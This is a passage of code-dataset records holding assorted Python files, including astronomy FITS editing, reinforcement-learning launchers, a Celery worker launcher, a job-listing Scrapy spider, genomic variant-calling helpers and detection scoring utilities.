np.vstack((data2, cube7[1,:]))\n data2 = np.vstack((data2, cube8[1,:]))\n\n#data2 = np.vstack((data2, cube1[1,:]))\n#data2 = np.vstack((data2, cube1[1,:]))\n#data2 = np.vstack((data2, cube2[1,:]))\n\n#C = 9.4e-09 # [median(mag=10) - median(no bckg)] / 10^(0.4*mag)\n#data2 = np.vstack((data2, data2[1,:] + C*10**(0.4*5)))\n#data2 = 
np.vstack((data2, data2[1,:] + C*10**(0.4*7.5)))\n#data2 = np.vstack((data2, data2[1,:] + C*10**(0.4*10)))\n\n\n#data2 = np.vstack((data2, data2[1,:]*C*10**(0.4*7.5)))\n#data2 = np.vstack((data2, data2[1,:]*C*10**(0.4*10)))\n\n\n# save fits file\nhdu = fits.PrimaryHDU(data2, header=hdr2) # select data2 / hdr2\nhdu.writeto(filename, overwrite=True)\nprint('new header')\nfits.open(filename)[0].header\n\n","sub_path":"heeps/contrast/edit_hdu.py","file_name":"edit_hdu.py","file_ext":"py","file_size_in_byte":9635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"11130989","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport cv2 as cv\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom Stereo import Stereo\n\npath = os.path.join(os.getcwd(), \"..\", \"dataset\", \"image_sequences\", \"box\")\nimg = cv.imread(os.path.join(path, '{:06d}.png'.format(0)))\ncount = 1\n\nstereo = Stereo()\nstereo.initialize(img)\n\nx = []\ny = []\n\nposition_figure = plt.figure(1)\nplt.title(\"Map\")\nposition_axes = position_figure.add_subplot(1, 1, 1)\nposition_axes.set_aspect('equal', adjustable='box')\n\nwhile True:\n img = cv.imread(os.path.join(path, '{:06d}.png'.format(count)))\n R, t, _ = stereo.nextFrame(img)\n x.append(t[0])\n y.append(t[1])\n position_axes.scatter(x, y, c=\"blue\", s=10)\n cv.imshow(\"Image\", img)\n count += 1\n if cv.waitKey(1) & 0xFF == ord('q'):\n cv.destroyAllWindows()\n break\n","sub_path":"src/replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"201058112","text":"import argparse\nimport numpy as np\nimport torch\nfrom agents import ActorCritic_BidAgent, SAC_BidAgent\nfrom society import Society, ClonedSociety\nfrom experiment import GridWorldExperiment, TabularDecentralizedLearner, DecentralizedLearner, DecentralizedExperiment\nfrom decentralized_sampler import DecentralizedSampler\n\nfrom starter_code.agent import LiteralAction_Agent, Subpolicy_Agent\nfrom starter_code.configs import env_manager_switch, process_config\nfrom starter_code.env_config import EnvRegistry as ER\nfrom starter_code.log import MultiBaseLogger\nfrom starter_code.multitask import construct_task_progression, default_task_prog_spec\nfrom starter_code.policies import SimpleBetaSoftPlusPolicy, BetaCNNPolicy, DiscretePolicy, DiscreteCNNPolicy\nfrom starter_code.rb import StaticMemory, ExpandedStaticMemory, PathMemory\nfrom starter_code.rl_algs import rlalg_switch\nfrom starter_code.value_function import SimpleValueFn, CNNValueFn, CNNQFn\n\nfrom starter_code.run import BaseLauncher\nfrom starter_code.utils import AttrDict, visualize_parameters\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Decentralized')\n parser.add_argument('--autorm', action='store_true')\n\n # Experiment\n parser.add_argument('--subroot', type=str, default='debug')\n parser.add_argument('--env-name', nargs='+', type=str, default='GW2')\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--alg-name', type=str, default='ppo')\n parser.add_argument('--printf', action='store_true')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--cpu', action='store_true')\n parser.add_argument('--expid', type=str, default='9999999')\n\n # Model\n parser.add_argument('--redundancy', type=int, default=2)\n parser.add_argument('--clone', action='store_true',\n help='redundant agents are cloned')\n parser.add_argument('--auctiontype', type=str, default='bb')\n parser.add_argument('--policy', type=str, default='cbeta',\n help='beta | cbeta')\n parser.add_argument('--ado', action='store_true',\n help='agent dropout')\n parser.add_argument('--memoryless', action='store_true')\n\n ##########################################\n parser.add_argument('--doublesampling', action='store_true',\n help='sample redundant agents twice')\n ##########################################\n\n args = parser.parse_args()\n args.hrl = False\n return args\n\n# TODO: update\ndef create_sac_networks():\n # qf1 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim, # shouldbe more explicit about what this should mean\n # )\n # qf2 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n # target_qf1 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n # target_qf2 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n\n qf1 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n qf2 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n target_qf1 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n target_qf2 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n return qf1, qf2, target_qf1, target_qf2\n\n\nclass DecentralizedLauncher(BaseLauncher):\n env_registry = 
ER() # may be mutable?\n\n @classmethod\n def policy_switch(cls, policy_name, state_dim, args):\n policy = dict(\n beta = lambda: SimpleBetaSoftPlusPolicy(state_dim, args.hdim, 1),\n cbeta = lambda: BetaCNNPolicy(state_dim[:-1], 1)\n )\n return policy[policy_name]\n\n @classmethod\n def experiment_switch(cls, env_name):\n envtype = cls.env_registry.get_env_type(env_name)\n\n experiment = dict(\n tab=GridWorldExperiment,\n gym=DecentralizedExperiment,\n mg=DecentralizedExperiment)\n\n if envtype == 'tab':\n learner = TabularDecentralizedLearner\n elif envtype == 'gym' or envtype == 'mg':\n learner = DecentralizedLearner\n else:\n assert False\n\n # TODO: make this cleaner\n experiment_builder = lambda society, task_progression, rl_alg, logger, device, args: experiment[envtype](\n learner=learner(\n organism=society,\n rl_alg=rl_alg,\n logger=logger,\n device=device,\n args=args,\n ),\n task_progression=task_progression,\n logger=logger,\n args=args,\n )\n return experiment_builder\n\n @classmethod\n def create_organism(cls, device, task_progression, args):\n if args.alg_name in ['ppo', 'vpg', 'a2c']:\n policy = cls.policy_switch(args.policy, task_progression.state_dim, args)\n valuefn = cls.value_switch(task_progression.state_dim, args)\n networks = lambda: dict(\n policy=policy(),\n valuefn=valuefn()\n )\n agent_builder = ActorCritic_BidAgent\n elif args.alg_name in ['sac']: # will add TD3\n\n policy = cls.policy_switch(args.policy, task_progression.state_dim, args) # same\n\n obs_dim = task_progression.state_dim\n args.agent_action_dim = 1 # hacky for target_entropy\n if not task_progression.is_disc_action:\n raise NotImplementedError('make sure target_entropy is set correctly')\n\n qf1, qf2, target_qf1, target_qf2 = create_sac_networks()\n\n networks = lambda: dict(\n policy=policy(),\n qf1=qf1(),\n qf2=qf2(),\n target_qf1=target_qf1(),\n target_qf2=target_qf2())\n agent_builder = SAC_BidAgent\n else:\n assert False\n\n agents, unique_agents = cls.create_agents(\n agent_builder=agent_builder, \n networks=networks, \n task_progression=task_progression,\n redundancy=args.redundancy,\n args=args, \n device=device)\n\n organism = Society(\n agents=agents, \n unique_agents=unique_agents,\n device=device,\n args=args)\n\n return organism\n\n @classmethod\n def create_transformation_builder(cls, state_dim, action_dim, args):\n transformation_builder = lambda id_num: LiteralAction_Agent(id_num)\n return transformation_builder\n\n @classmethod\n def create_cloned_agents(cls, agent_builder, networks, transformation_builder, num_primitives, redundancy, args, device):\n agents = []\n unique_agents = []\n\n replay_buffer = lambda: PathMemory(\n max_replay_buffer_size=args.max_buffer_size*redundancy)\n for k in range(len(args.parents)):\n print('new parent')\n for i in range(num_primitives):\n # same networks\n print('new network')\n agent_networks = networks()\n agent_replay_buffer = replay_buffer()\n transformation = transformation_builder(i)\n\n for j in range(redundancy):\n print('new clone')\n # because winner % action_dim!\n # NOTE that we cannot change this unless we change the modulo in indespensible_learnable_active_agents in auction.py\n id_num = i + j*num_primitives + k*(num_primitives*redundancy)\n agent = agent_builder(\n id_num=id_num,\n transformation=transformation,\n networks=agent_networks, # these are cloned!\n replay_buffer = agent_replay_buffer,\n args=args).to(device)\n agents.append(agent)\n if j == 0:\n unique_agents.append(agent) # or you can tag the agent as \"canoncical\"\n 
print('k: {} i: {} j: {} id_num: {}'.format(k, i, j, id_num))\n return agents, unique_agents\n\n @classmethod\n def create_uncloned_agents(cls, agent_builder, networks, transformation_builder, num_primitives, redundancy, args, device):\n agents = []\n replay_buffer = lambda: PathMemory(max_replay_buffer_size=args.max_buffer_size)\n for k in range(len(args.parents)):\n print('new parent')\n for i in range(num_primitives):\n transformation = transformation_builder(i) # the bidders are uncloned, but the transformations are\n for j in range(args.redundancy):\n print('new network')\n # NOTE that we cannot change this unless we change the modulo in indespensible_learnable_active_agents in auction.py\n id_num = i + j*num_primitives + k*(num_primitives*redundancy)\n agent = agent_builder(\n id_num=id_num,\n transformation=transformation,#transformation_builder(i),\n networks=networks(),\n replay_buffer = replay_buffer(),\n args=args).to(device)\n agents.append(agent)\n print('k: {} i: {} j: {} id_num: {}'.format(k, i, j, id_num))\n\n return agents, agents\n\n @classmethod\n def create_agents_generic(cls, agent_builder, networks, task_progression, num_primitives, redundancy, args, device):\n transformation_builder = cls.create_transformation_builder(\n state_dim=task_progression.state_dim, \n action_dim=task_progression.action_dim, \n args=args)\n\n if args.clone:\n agents, unique_agents = cls.create_cloned_agents(\n agent_builder=agent_builder,\n networks=networks, \n transformation_builder=transformation_builder, \n num_primitives=num_primitives,\n redundancy=redundancy,\n args=args, \n device=device)\n else:\n agents, unique_agents = cls.create_uncloned_agents(\n agent_builder=agent_builder,\n networks=networks, \n transformation_builder=transformation_builder,\n num_primitives=num_primitives,\n redundancy=redundancy,\n args=args, \n device=device)\n\n agents = sorted(agents, key=lambda x: x.id) # need to make sure the index corresponds to agent id\n unique_agents = sorted(unique_agents, key=lambda x: x.id) # need to make sure the index corresponds to agent id\n return agents, unique_agents\n\n @classmethod\n def create_agents(cls, agent_builder, networks, task_progression, redundancy, args, device):\n agents = cls.create_agents_generic(\n agent_builder=agent_builder, \n networks=networks, \n task_progression=task_progression, \n num_primitives=task_progression.action_dim,\n redundancy=redundancy, \n args=args, \n device=device)\n return agents\n\n @classmethod\n def main(cls, parse_args):\n args, device = cls.initialize(parse_args())\n logger = MultiBaseLogger(args=args)\n task_progression = cls.create_task_progression(logger, args)\n organism = cls.create_organism(device, task_progression, args)\n rl_alg = rlalg_switch(args.alg_name)(device=device, args=args)\n experiment_builder = cls.experiment_switch(args.env_name[0])\n experiment = experiment_builder(\n society=organism, \n task_progression=task_progression,\n rl_alg=rl_alg,\n logger=logger,\n device=device,\n args=args)\n experiment.main_loop(max_epochs=args.max_epochs)\n\n\nif __name__ == '__main__':\n launcher = DecentralizedLauncher()\n launcher.main(parse_args)\n\n\n# # python information_economy/scratch/vickrey.py --rlalg ppo --env MiniGrid-Empty-Random-5x5-v0 --envtype mg --policy cbeta --debug --auctiontype bb --critic cnn\n","sub_path":"auction/vickrey.py","file_name":"vickrey.py","file_ext":"py","file_size_in_byte":12576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"199295277","text":"from typing import List\n\nimport Globals\nimport SourceManager\n\n\nclass ComicManager:\n\n comicList: List[SourceManager.Comic] = []\n sourceList: List[SourceManager.ComicStripInfo] = []\n currentComic = -1\n\n def __init__(self, length=Globals.ImageItems):\n '''\n :param length: Number of comic from each source\n '''\n\n self.sourceList = SourceManager.read_json()\n self.comicList = self.load_comics(length)\n\n print('comics loaded')\n\n def load_comics(self, length=Globals.ImageItems):\n print('Loading Comics ...')\n comics = []\n\n for source in self.sourceList:\n comic = SourceManager.download_comic(source, length)\n comics.append(comic)\n\n return comics\n\n def get_comic(self, comic_index=0):\n comic = self.comicList[comic_index]\n self.currentComic = comic_index\n return comic\n\n def get_next(self):\n if self.currentComic < len(self.comicList):\n self.currentComic += 1\n return self.comicList[self.currentComic]\n else:\n self.load_comics()\n\n def get_prev(self):\n if self.currentComic > 0:\n self.currentComic -= 1\n return self.comicList[self.currentComic]\n\n\n","sub_path":"src/ComicManager.py","file_name":"ComicManager.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"647374444","text":"# -*- coding: utf-8 -*-\nfrom assertpy import assert_that\nimport pytest\nfrom typing import Union, AnyStr, Pattern\nfrom sarah import ValueObject\nimport re\n\n\nclass TestInit(object):\n class MyValue(ValueObject):\n def __init__(self, key1=\"spam\", key2=\"ham\", key3=None):\n pass\n\n obj1 = MyValue(key1=\"Foo\",\n key2=\"ham\",\n key3={'123': \"spam\", 'ham': 456})\n\n assert_that(obj1[\"key1\"]).is_equal_to(\"Foo\")\n assert_that(obj1[\"key2\"]).is_equal_to(\"ham\")\n assert_that(obj1[\"key3\"]).is_equal_to({'ham': 456, '123': \"spam\"})\n\n obj2 = MyValue(key1=\"Foo\",\n key3={'ham': 456, '123': \"spam\"})\n\n assert_that(obj1).is_equal_to(obj2)\n assert_that(hash(obj1)).is_equal_to(hash(obj2))\n\n\nclass TestOverride(object):\n class MyValueWithInit(ValueObject):\n def __init__(self, pattern: Union[Pattern, AnyStr]=None, key1=\"spam\"):\n if isinstance(pattern, str):\n self['pattern'] = re.compile(pattern)\n\n obj1 = MyValueWithInit(pattern=\"str\",\n key1=\"Foo\")\n obj2 = MyValueWithInit(pattern=re.compile(\"str\"),\n key1=\"Foo\")\n\n assert_that(obj1) \\\n .described_as(\"obj1.pattern is properly converted to regexp pattern\") \\\n .is_equal_to(obj2)\n\n assert_that(hash(obj1)).is_equal_to(hash(obj2))\n\n\nclass TestMalformedClassDeclaration(object):\n class MyValueWithKWArgs(ValueObject):\n def __init__(self, **kwargs):\n pass\n\n with pytest.raises(ValueError) as e:\n obj1 = MyValueWithKWArgs(pattern=\"str\",\n key1=\"Foo\")\n\n assert_that(e.value.args[0]) \\\n .is_equal_to(\"__init__ with *args or **kwargs are not allowed\")\n","sub_path":"tests/test_value_object.py","file_name":"test_value_object.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455405133","text":"import os\nimport subprocess\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.template.loader import render_to_string\n\nfrom snoop.profiler import Profiler\n\nfrom ... import tasks\n\n\ndef celery_argv(custom_workers_no, queues):\n workers_multiplier = 1\n cpu_count = os.cpu_count()\n max_workers_no = min(int(cpu_count * 1.5), 100)\n\n celery_binary = (\n subprocess.check_output(['which', 'celery'])\n .decode('latin1')\n .strip()\n )\n\n argv = [\n celery_binary,\n '-A', 'snoop.data',\n '--loglevel=info',\n 'worker',\n '-Ofair',\n '--max-tasks-per-child', '500',\n '-Q', ','.join(queues),\n ]\n\n workers_no = int(custom_workers_no) if custom_workers_no else int(cpu_count * workers_multiplier)\n if workers_no > max_workers_no:\n print(f'Limitting the number of workers to {max_workers_no} on {cpu_count} CPUs.')\n workers_no = max_workers_no\n else:\n print(f'Starting with {workers_no} workers on {cpu_count} CPUs.')\n\n argv += ['-c', str(workers_no)]\n\n return argv\n\n\ndef create_procfile(celery_args):\n with open('Procfile', 'w') as procfile:\n out = render_to_string('snoop/Procfile', context={'workers_command': ' '.join(celery_args)})\n procfile.write(out)\n\n\nclass Command(BaseCommand):\n help = \"Run celery worker\"\n\n def add_arguments(self, parser):\n parser.add_argument('func', nargs='*',\n help=\"Task types to run\")\n parser.add_argument('-n', '--workers-no',\n help=\"Number of workers to start\")\n parser.add_argument('-p', '--prefix',\n help=\"Prefix to insert to the queue name\")\n\n def handle(self, *args, **options):\n with Profiler():\n tasks.import_shaormas()\n if options.get('prefix'):\n prefix = options['prefix']\n settings.TASK_PREFIX = prefix\n else:\n prefix = settings.TASK_PREFIX\n queues = options.get('func') or tasks.shaormerie\n argv = celery_argv(\n custom_workers_no=options.get('workers_no'),\n queues=[f'{prefix}.{queue}' for queue in queues] + ['watchdog'],\n )\n print('+', *argv)\n create_procfile(argv)\n honcho_binary = (\n subprocess.check_output(['which', 'honcho'])\n .decode('latin1')\n .strip()\n )\n os.execv(honcho_binary, [honcho_binary, 'start'])\n","sub_path":"snoop/data/management/commands/runworkers.py","file_name":"runworkers.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"449537318","text":"#!/usr/bin/env python3\nfrom lilaclib import *\n\nmaintainers = [{'github': 'petronny', 'email': 'Jingbei Li '}]\nupdate_on = [{'aur': None}]\nrepo_depends = [\n 'hipblas',\n 'hipcub',\n 'hipsparse',\n 'rocalution',\n 'rocblas',\n 'rocfft',\n 'rocprim',\n 'rocrand',\n 'rocsparse',\n 'rocthrust',\n ]\nbuild_prefix = 'extra-x86_64'\npre_build = aur_pre_build\npost_build = aur_post_build\n\nif __name__ == '__main__':\n single_main(build_prefix)\n","sub_path":"rocm-libs/lilac.py","file_name":"lilac.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"461571893","text":"\"\"\"\n This spider is a Ifgprojectresourcing spider created on top of the ATSSpider\n scrapy crawl ifgprojectresourcing -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.ifgprojectresourcing.com/opportunities.html\"\n\n sample job url:\n http://www.ifgprojectresourcing.com/job/jobdetails.html?id=11023\n\"\"\"\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass Ifgprojectresourcing(ATSSpider):\n\n name = \"ifgprojectresourcing\"\n item_map = {\n 'Pay Rate': 'baseSalary',\n 'Location': 'location',\n 'Job Type ': 'jobtype',\n 'Job ID': 'ref_num',\n }\n\n def parse(self, response):\n selector = Selector(response)\n tableheads = selector.xpath(\n '//div[@class=\"postentry\"]/table/tr/td//strong/text()').extract()\n meta_xpaths = {}\n for th in tableheads:\n if th in self.item_map:\n meta_xpaths[self.item_map[th]] = \".//tr/td[\" + str(\n tableheads.index(th) + 1\n ) + \"]/div/text()\"\n\n jobs = selector.xpath(\n '//div[@class=\"postentry\"]/form[contains(@name, \"form\")]//tr/td[@class=\"subtitle\"]'\n )\n for job in jobs:\n url = job.xpath('.//tr/td/a[@class=\"lbOn\"]/@href').extract()\n if url:\n meta = {}\n for mx in meta_xpaths:\n meta[mx] = job.xpath(meta_xpaths[mx]).extract()\n\n meta['title'] = job.xpath(\n './/span[@class=\"subtitle\"]/text()').extract()\n yield Request(\n callback=self.parse_job_callback(),\n meta=meta,\n url=url[0]\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath(\n 'company_description', '//div[@id=\"Layer1\"]/table//tr[last()-1]'\n )\n loader.add_xpath(\n 'description', '//div[@id=\"Layer1\"]/table//tr[last()]'\n )\n\n loader.add_value(\n 'referencenumber', response.meta.get('ref_num'),\n Prefix('%s-' % self.name)\n )\n loader.add_value('baseSalary', response.meta.get('baseSalary'))\n loader.add_value('jobtype', response.meta.get('jobtype'))\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/ifgprojectresourcing.py","file_name":"ifgprojectresourcing.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"102869182","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dataportal3', '0031_auto_20160416_2343'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='spatialsurveylinkgroup',\n name='geom_table_name',\n ),\n migrations.RemoveField(\n model_name='spatialsurveylinkgroup',\n name='survey',\n ),\n migrations.AddField(\n model_name='spatialsurveylink',\n name='data_formatting',\n field=models.TextField(null=True, blank=True),\n ),\n ]\n","sub_path":"dataportal3/migrations/0032_auto_20160503_1535.py","file_name":"0032_auto_20160503_1535.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"410430006","text":"import re\nimport datetime\n\n\nclass ImpalaStats(object):\n ITEMS_TO_TRACK = [\n 'admission-controller.*',\n 'jvm.total.*',\n 'impala.thrift-server.*',\n 'impala-server.num-queries',\n 'impala-server.num-queries-expired',\n 'memory.rss',\n 'memory.total-used',\n 'tcmalloc.*'\n ]\n\n def __init__(self, statsd):\n self._statsd = statsd\n\n def send(self, node, payload):\n #print(payload)\n now = datetime.datetime.now()\n for pattern in self.ITEMS_TO_TRACK:\n for key in payload['metric_group']['metrics']:\n #print(\"keyname = \" + key[\"name\"] + \"\\n\")\n if re.match(pattern, str(key['name'])):\n #print(now.isoformat() + \": Regex matches \" + key['name'] + \"\\tvalue: \" + str(key['value']) + \" node: \" + node)\n extended_key = \"{}.{}\".format(node.replace(':25000', '').replace('.', '_'), key[\"name\"])\n self._statsd.gauge(extended_key, int(key[\"value\"]))\n\n for item in payload['metric_group']['child_groups']:\n for key in item['metrics']:\n #print(\"keyname = \" + key[\"name\"] + \"\\n\")\n if re.match(pattern, str(key['name'])):\n #print(now.isoformat() + \": Regex matches #2 \" + key[\"name\"] + \"\\tvalue: \" + str(key['value']) + \" node: \" + node)\n extended_key = \"{}.{}\".format(node.replace(':25000', '').replace('.', '_'), key[\"name\"])\n self._statsd.gauge(extended_key, int(key[\"value\"]))\n","sub_path":"impala_monitor/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"262446750","text":"import sys,pysam, time,os,copy,argparse,subprocess, random, re, datetime\nimport numpy as np\nimport multiprocessing as mp\nfrom pysam import VariantFile\nfrom subprocess import Popen, PIPE, STDOUT\nfrom Bio import pairwise2\nfrom intervaltree import Interval, IntervalTree\n\ngt_map={(0,0):0, (1,1):1, (0,1):2, (1,0):2,(1,2):3, (2,1):3}\n\nmapping={'A':0,'G':1,'T':2,'C':3,'-':4}\nrev_base_map={0:'A',1:'G',2:'T',3:'C',4:'-'}\n\nallele_map={('I','I'):0, ('D','D'):1, ('N','I'):2, ('I','N'):3, ('N','D'):4, ('D','N'):5, \\\n ('I','D'):6, ('D','I'):7, ('N','N'):8}\n\ndef pairwise(x,y):\n alignments = pairwise2.align.globalms(x, y, 2, -1.0, -0.9, -0.1)\n\n return alignments\n\ndef msa(seq_list, ref, v_pos, mincov, maxcov):\n np.random.seed(812)\n sample=list(seq_list.keys())\n \n if len(sample) > maxcov:\n sample=random.sample(sample,min(len(sample),maxcov))\n\n sample=sorted(sample)\n \n fa_tmp_file=''.join(['>%s_SEQ\\n%s\\n'%(read_name,seq_list[read_name]) for read_name in sample])\n\n\n fa_tmp_file+='>ref_SEQ\\n%s' %ref\n \n gap_penalty=1.0\n msa_process =Popen(['muscle', '-quiet','-gapopen','%.1f' %gap_penalty,'-maxiters', '1' ,'-diags1'], stdout=PIPE, stdin=PIPE, stderr=PIPE)\n hap_file=msa_process.communicate(input=fa_tmp_file.encode('utf-8'))\n\n if len(hap_file)==0:\n print('hapfile length 0')\n\n\n tmp=hap_file[0].decode('utf-8')[1:].replace('\\n','').split('>')\n\n zz_0=[]\n for seq in tmp:\n p1,p2=seq.split('_SEQ')\n if p1!='ref':\n zz_0.append(p2[:128])\n else:\n ref_real_0=p2\n\n if len(zz_0)=dct['mincov'] and len(read_names_1)>=dct['mincov']:\n output['pos'].append(pcol.pos+1)\n \n if in_bed(include_intervals, v_pos) and not ex_bed(exclude_intervals, v_pos): \n read_names=pcol.get_query_names()\n read_names_0=set(read_names) & hap_reads_0\n read_names_1=set(read_names) & hap_reads_1\n len_seq_0=len(read_names_0)\n len_seq_1=len(read_names_1)\n \n if len_seq_0>=dct['mincov'] and len_seq_1>=dct['mincov']:\n seq=[x for x in pcol.get_query_sequences( mark_matches=False, mark_ends=False, add_indels=True)]\n\n tmp_seq_0=''.join([s for n,s in zip(read_names,seq) if n in read_names_0])\n tmp_seq_1=''.join([s for n,s in zip(read_names,seq) if n in read_names_1])\n\n del_freq_0=(tmp_seq_0.count('-'))/len_seq_0 if len_seq_0>0 else 0\n ins_freq_0=tmp_seq_0.count('+')/len_seq_0 if len_seq_0>0 else 0\n\n del_freq_1=(tmp_seq_1.count('-'))/len_seq_1 if len_seq_1>0 else 0\n ins_freq_1=tmp_seq_1.count('+')/len_seq_1 if len_seq_1>0 else 0\n\n if 0.3<=del_freq_0 or 0.3<=del_freq_1 or 0.3<=ins_freq_0 or 0.3<=ins_freq_1:\n output['high'].append(pcol.pos+1)\n\n elif del_freq_0<=0.2 and del_freq_1<=0.2 and ins_freq_0<=0.1 and ins_freq_1<=0.1 and np.random.randint(100)==0:\n output['low'].append(pcol.pos+1)\n \n \n if output['pos']:\n tr_len=len(output['pos']) \n else:\n tr_len=20\n \n sizes={'high':tr_len, 'low':tr_len}\n\n output['pos']=set(output['pos'])\n \n \n for i in ['high','low']:\n if sizes[i]= 0:\n sumGasRmn += gasRmn\n else:\n sumGasRmn = gasRmn\n start = i\n totalGasRmn += gasRmn\n if totalGasRmn >= 0:\n return start\n else:\n return -1\n ","sub_path":"leetcodepy/src/problemset/GasStation.py","file_name":"GasStation.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"164875680","text":"from os import path\nfrom collections import Counter\nimport csv\n\nDATA_DIR = 'tempdata'\nfilename = path.join(DATA_DIR, 'wrangledbabynames.csv')\nsearch_list = ['Michael', 'Kelly', 'Kanye', 'THOR',\n 'casey', 'Arya', 'ZZZblahblah']\n\nindex = {}\nwith open(filename, 'r') as csv_file:\n rows = csv.DictReader(csv_file)\n for row in rows:\n lower_name = row['name'].lower()\n index[lower_name] = row\n\ndef analyze_name(name):\n lower_name = name.lower()\n if lower_name in index:\n return index[lower_name]\n return {'name': name,\n 'gender': 'NA',\n 'ratio': None,\n 'males': None,\n 'females': None,\n 'total': 0}\n\ngender_counts = Counter()\nfemale_babies_count = 0\nmale_babies_count = 0\nfor name in search_list:\n data = analyze_name(name)\n print(name, data['gender'], data['ratio'])\n gender_counts[data['gender']] += 1\n if data['females']:\n female_babies_count += int(data['females'])\n if data['males']:\n male_babies_count += int(data['males'])\nprint('Total:')\nprint(*['{}: {}'.format(gender, gender_counts[gender])\n for gender in sorted(gender_counts.keys())\n ])\nprint('females: {} males: {}'.format(female_babies_count, male_babies_count))\n","sub_path":"exercises/0020-gender-detector/k.py","file_name":"k.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"133698592","text":"from __future__ import division\n\nimport numpy as np\nfrom scipy.optimize import linear_sum_assignment\n\nfrom .detection_base import DetectionBaseScoreType\n\nfrom ..iou import cc_iou as iou\n\n\ndef _select_minipatch_tuples(minipatch, y_true, y_pred):\n \"\"\"\n\n Parameters\n ----------\n minipatch : list of int\n Bounds of the internal scoring patch\n y_true, y_pred : list of tuples\n Full list of labels and predictions\n\n Returns\n -------\n y_true, y_pred : list of tuples\n List of labels and predictions restricted to\n the central minipatch\n\n \"\"\"\n row_min, row_max, col_min, col_max = minipatch\n\n y_true = np.asarray(y_true)\n y_pred = np.asarray(y_pred)\n\n y_true_cut = ((y_true[0] >= col_min) & (y_true[0] < col_max) &\n (y_true[1] >= row_min) & (y_true[1] < row_max))\n y_pred_cut = ((y_pred[0] >= col_min) & (y_pred[0] < col_max) &\n (y_pred[1] >= row_min) & (y_pred[1] < row_max))\n\n return y_true[y_true_cut].tolist(), y_pred[y_pred_cut].tolist()\n\n\ndef _match_tuples(y_true, y_pred, minipatch=None):\n \"\"\"\n Given set of true and predicted (x, y, r) tuples, determine the best\n possible match.\n\n Parameters\n ----------\n y_true, y_pred : list of tuples\n\n Returns\n -------\n (idxs_true, idxs_pred, ious)\n idxs_true, idxs_pred : indices into y_true and y_pred of matches\n ious : corresponding IOU value of each match\n\n The length of the 3 arrays is identical and the minimum of the length\n of y_true and y_pred\n\n \"\"\"\n\n n_true = len(y_true)\n n_pred = len(y_pred)\n\n if minipatch is not None:\n y_true, y_pred = _select_minipatch_tuples(minipatch, y_true, y_pred)\n\n iou_matrix = np.empty((n_true, n_pred))\n\n for i in range(n_true):\n for j in range(n_pred):\n iou_matrix[i, j] = iou(y_true[i], y_pred[j])\n\n idxs_true, idxs_pred = linear_sum_assignment(1 - iou_matrix)\n\n if (not idxs_true.size) or (not idxs_pred.size):\n ious = np.array([])\n else:\n ious = iou_matrix[idxs_true, idxs_pred]\n return idxs_true, idxs_pred, ious\n\n\ndef _count_matches(y_true, y_pred, matches, iou_threshold=0.5):\n \"\"\"\n Count the number of matches.\n\n Parameters\n ----------\n y_true, y_pred : list of list of tuples\n matches : optional, output of _match_tuples\n iou_threshold : float\n\n Returns\n -------\n 